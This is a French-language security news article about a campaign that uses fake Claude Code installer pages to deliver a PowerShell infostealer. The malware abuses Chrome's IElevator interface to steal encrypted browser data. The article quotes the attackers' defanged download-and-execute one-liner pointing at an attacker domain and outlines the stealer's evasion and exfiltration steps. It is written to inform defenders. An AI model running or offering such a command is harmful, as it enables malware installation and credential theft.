Les attaquants utilisent de faux installateurs Claude Code pour déployer des logiciels malveillants qui abusent de l’interface IElevator de Chrome pour voler les données protégées du navigateur.
Les développeurs à la recherche de l’outil Claude Code d’Anthropic, de plus en plus populaire, sont désormais incités à télécharger des logiciels malveillants.
Selon les chercheurs d’Ontinue, les attaquants exploitent un faux programme d’installation de Claude Code pour fournir une charge utile PowerShell jusqu’alors non documentée. Le malware est conçu pour échapper à la détection, récupérer le matériel de cryptage du navigateur et voler les données sensibles des systèmes des développeurs.
« Les développeurs détiennent les clés des actifs les plus sensibles d’une organisation : propriété intellectuelle, infrastructure cloud, pipelines CI/CD », a déclaré Vineeta Sangaraju, ingénieur de recherche en IA chez Black Duck. « Ils ont également besoin, par nécessité, de la liberté de télécharger et d’installer des logiciels. Cette combinaison en fait une cible de grande valeur. »
Les chercheurs d’Ontinue ont déclaré que tout ce qui est possiblement détectable sur la chaîne d’attaque est intégré dans le chargeur PowerShell, ce qui complique la détection. « Deux ensembles de règles de chaîne API standard que nous avons évalués par rapport au binaire n’ont renvoyé aucune correspondance », ont-ils déclaré dans un article de blog.
Le logiciel malveillant a activé « l’exclusion géographique », ce qui lui permet d’analyser les paramètres des régions Windows de l’hôte par rapport à une liste de zones géographiques à exclure, à savoir tous les États membres de la CEI et l’Iran, et d’interrompre immédiatement l’exécution en cas de correspondance.
La campagne remplace la configuration légitime sur une seule ligne de Claude Code
Selon Ontinue, la campagne repose sur de fausses pages d’installation se faisant passer pour les canaux de distribution de Claude Code. Cependant, plutôt que de fournir la routine d’installation légitime sur une ligne d’Anthropic, « irm https(:)//claude(.)ai/install.ps1 | iex », les pages servent des commandes PowerShell contrôlées par les attaquants (« irm events(.)msft23(.)com | iex ») qui lancent une chaîne de charge utile par étapes.
Une fois exécutée, la routine malveillante déploie plusieurs composants destinés à établir la persistance tout en minimisant les indicateurs comportementaux généralement associés aux chargeurs de logiciels malveillants courants.
« Tout ce qui est facilement détecté, l’accès à la base de données SQLite, la construction d’archives, l’exfiltration HTTPS, la persistance des tâches planifiées et la chaîne d’injection de processus elle-même, réside exclusivement dans le chargeur PowerShell », ont déclaré les chercheurs, ajoutant que l’assistant natif n’expose aucune importation de réseau, de cryptographie ou d’énumération de fichiers.
Le seul signe révélateur est une seule invocation indirecte de COM vtable, ont-ils noté.
Une liste de choses que le malware peut faire, tout en se cachant des regards indiscrets, comprend l’exclusion géographique, la collecte d’identifiants, l’énumération du navigateur, la gestion des clés v10/v20, la correspondance et le lancement de l’architecture PowerShell, le décryptage et la collecte, l’exfiltration et la persistance.
« Remplacer un programme d’installation légitime par un programme malveillant n’est pas une nouvelle attaque », a souligné Sangaraju. « Cependant, ce qui rend cette campagne en cours remarquable, c’est la précision avec laquelle elle a été conçue pour échapper aux méthodes de détection sur lesquelles s’appuient aujourd’hui la plupart des équipes de sécurité. L’activité malveillante est délibérément structurée pour paraître inoffensive aux scanners. »
Les services d’élévation de Chrome ont été abusés pour pirater le cryptage
Les chercheurs ont également parlé du malware abusant des services Chrome Elevation pour récupérer le matériel de chiffrement associé aux protections Application-Bound Encryption (ABE). La charge utile exploite l’interface COM IElevator2 dans Chrome pour récupérer les clés de chiffrement (ABE).
Cette fonctionnalité a aidé les attaquants à accéder aux données protégées par le navigateur, normalement inaccessibles aux voleurs d’informations. Google a introduit ABE dans Chrome 127 en juillet 2024, spécifiquement pour empêcher les voleurs de produits de supprimer les cookies et les mots de passe enregistrés dans les bases de données SQLite.
Ontinue n’a pas fait de réclamations d’attribution fermes car il n’a trouvé aucune correspondance avec les TTP publiés associés à des familles populaires comme Lumma, StealC, Vidar, EDDIESTEALER, Katz, VoidStealer, Storm et XenoSteler, entre autres. Les chercheurs se sont rapprochés le plus d’une correspondance avec Glove Stealer, qui abuse également d’IElevator, mais ils ont rejeté une attribution directe, citant six aspects différents.
Un ensemble de règles YARA et un ensemble d’indicateurs de compromission (IOC) ont été partagés via les référentiels GitHub pour prendre en charge la détection, les chercheurs recommandant un ensemble supplémentaire de bonnes pratiques. Celles-ci comprenaient l’application du mode de langage contraint PowerShell, l’activation de l’authentification MFA résistante au phishing, l’activation et la vérification de la protection contre la falsification AMSI et le blocage des domaines nouvellement enregistrés.
